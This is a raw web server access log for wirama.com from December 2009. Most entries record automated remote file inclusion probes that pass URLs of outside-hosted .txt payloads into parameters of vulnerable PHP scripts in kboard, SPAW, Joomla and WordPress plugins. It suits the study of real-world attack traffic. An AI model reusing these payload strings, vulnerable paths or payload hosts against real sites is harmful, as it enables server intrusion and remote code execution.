77.221.130.11 - - [01/Dec/2009:04:28:51 -0800] "GET /include/prodler.class.php?sPath=http://forum.redglove.it//drive/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:53 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:53 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:53 -0800] "GET /logs/access_090329.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:53 -0800] "GET /logs/access_090501.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:58 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:58 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:58 -0800] "GET /logs/access_090329.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:28:58 -0800] "GET /logs/access_090501.log%20%20//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:29:00 -0800] "GET /logs/access_090329.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:29:06 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:29:06 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:29:06 -0800] "GET /logs/access_090401.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:29:10 -0800] "GET /logs/access_090601.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:29:32 -0800] "GET /logs/access_090501.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:29:34 -0800] "GET /logs/access_090501.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:29:55 -0800] "GET /logs/access_090329.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:29:57 -0800] "GET /logs/access_090329.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:10 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:10 -0800] "GET /logs/access_090401.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:10 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:12 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:12 -0800] "GET /logs/access_090401.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:12 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:26 -0800] "GET /logs/access_090601.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.255.23.47 - - [01/Dec/2009:04:30:26 -0800] "GET /logs/access_090601.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.cwbongrim.or.kr/zboard/icon/private_name/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
65.55.207.93 - - [01/Dec/2009:04:32:55 -0800] "GET /_private/?M=A HTTP/1.1" 200 675 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:50:35 -0800] "GET /?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:51:14 -0800] "GET /logs/?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:51:15 -0800] "GET /logs/access_090330.log/?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:51:15 -0800] "GET /logs/access_090301.log/?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:04:53:54 -0800] "GET /logs//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:04:53:54 -0800] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:04:53:54 -0800] "GET /logs/access_090330.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:04:53:59 -0800] "GET /logs/access_090801.log%20%20//modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
210.127.209.27 - - [01/Dec/2009:04:54:20 -0800] "GET /?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 916 "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:54:20 -0800] "GET /logs/?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 200 3512 "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:54:20 -0800] "GET /logs/access_090301.log/?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
210.127.209.27 - - [01/Dec/2009:04:54:54 -0800] "GET /logs/access_090330.log/?%20view=page&pagename=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.245.165.135 - - [01/Dec/2009:05:01:11 -0800] "GET /logs/access_090501.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://couplehome.com/bbs/skin/ggerzer_diary/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.245.165.135 - - [01/Dec/2009:05:01:11 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://couplehome.com/bbs/skin/ggerzer_diary/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.245.165.135 - - [01/Dec/2009:05:01:11 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://couplehome.com/bbs/skin/ggerzer_diary/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.245.165.135 - - [01/Dec/2009:05:01:16 -0800] "GET /logs/access_090801.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://couplehome.com/bbs/skin/ggerzer_diary/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.245.165.135 - - [01/Dec/2009:05:04:43 -0800] "GET /logs/access_090801.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://couplehome.com/bbs/skin/ggerzer_diary/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.245.165.135 - - [01/Dec/2009:05:04:43 -0800] "GET /logs/access_090501.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://couplehome.com/bbs/skin/ggerzer_diary/images/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:05:15:14 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:15:14 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:15:14 -0800] "GET /logs/access.log//skin/happycast_category_darkblack//ask_password.php?dir=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:16:52 -0800] "GET /logs/access.log//skin/happycast_category_darkblack//ask_password.php?dir=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:16:52 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:16:52 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:17:16 -0800] "GET /skin/happycast_category_darkblack//ask_password.php?dir=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:17:16 -0800] "GET /logs//skin/happycast_category_darkblack//ask_password.php?dir=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:05:17:16 -0800] "GET /logs/access.log//skin/happycast_category_darkblack//ask_password.php?dir=http://www.futurenetwork.com.br/loja/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:28:16 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:28:16 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:28:16 -0800] "GET /logs/access_090701.log//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:01 -0800] "GET /logs/access_090701.log//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:01 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:01 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:22 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:22 -0800] "GET /logs/access_090701.log//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:22 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:32 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:32 -0800] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
189.126.99.142 - - [01/Dec/2009:05:29:32 -0800] "GET /logs/access_090701.log//include/print_category.php?setup[use_category]=1&dir=http://www.jejuwon.org/zboard///data/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:05:36:54 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:05:36:54 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:05:36:54 -0800] "GET /logs/access.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:05:36:59 -0800] "GET /logs/access_090801.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:05:39:17 -0800] "GET /logs/access_090901.log/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:05:39:17 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
61.72.254.214 - - [01/Dec/2009:05:39:17 -0800] "GET /logs/includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://kb27.co.kr/bbs///id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
208.80.193.36 - - [01/Dec/2009:05:39:44 -0800] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; IEMB3; Windows-Media-Player/10.00.00.3990; IEMB3)" "wirama.com"
114.108.177.238 - - [01/Dec/2009:05:51:51 -0800] "GET /error.php?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:05:51:51 -0800] "GET /logs/access_090801.log%20%20/error.php?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:05:51:51 -0800] "GET /logs/error.php?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:05:52:35 -0800] "GET /logs/access_090801.log%20%20/error.php?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:05:52:35 -0800] "GET /error.php?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
114.108.177.238 - - [01/Dec/2009:05:52:35 -0800] "GET /logs/error.php?dir=http://www.ararabr.com.br/images/cssc/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
209.92.156.53 - - [01/Dec/2009:06:07:25 -0800] "GET /logs//admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:07:25 -0800] "GET /admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:07:25 -0800] "GET /logs/access_090401.log//admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:07:35 -0800] "GET /logs/access_090731.log//admin/spaw/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.160.17.200 - - [01/Dec/2009:06:09:22 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://jerx.fileave.com/id1.txt???? HTTP/1.1" 200 3519 "-" "Mozilla/5.0" "wirama.com"
125.160.17.200 - - [01/Dec/2009:06:09:22 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://jerx.fileave.com/id1.txt???? HTTP/1.1" 200 917 "-" "Mozilla/5.0" "wirama.com"
125.160.17.200 - - [01/Dec/2009:06:09:22 -0800] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://jerx.fileave.com/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.131.226.52 - - [01/Dec/2009:06:09:45 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.131.226.52 - - [01/Dec/2009:06:09:45 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.131.226.52 - - [01/Dec/2009:06:09:57 -0800] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:10:29 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:10:29 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:10:29 -0800] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:10:40 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
202.131.226.52 - - [01/Dec/2009:06:10:45 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?spaw_root=http://cetul.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:11:38 -0800] "GET /admin/spaw/spaw_control.class.php?=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:11:38 -0800] "GET /logs/access_090601.log//admin/spaw/spaw_control.class.php?=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:11:38 -0800] "GET /logs//admin/spaw/spaw_control.class.php?=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
209.92.156.53 - - [01/Dec/2009:06:11:51 -0800] "GET /logs/access_090329.log//admin/spaw/spaw_control.class.php?=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
75.126.127.34 - - [01/Dec/2009:06:16:02 -0800] "GET /modules.php?name=http://www.futurenetwork.com.br/loja/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:06:16:06 -0800] "GET /logs/access_090329.log%20%20/modules.php?name=http://www.futurenetwork.com.br/loja/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:06:16:06 -0800] "GET /logs/modules.php?name=http://www.futurenetwork.com.br/loja/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
75.126.127.34 - - [01/Dec/2009:06:16:57 -0800] "GET /logs/access_090329.log/modules.php?name=http://www.futurenetwork.com.br/loja/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
200.58.71.90 - - [01/Dec/2009:06:38:57 -0800] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.58.71.90 - - [01/Dec/2009:06:38:57 -0800] "GET /logs/access_090801.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
200.58.71.90 - - [01/Dec/2009:06:38:57 -0800] "GET /logs///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hyonsvc.co.kr//bbs//skin/ggambo7002_board/s.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
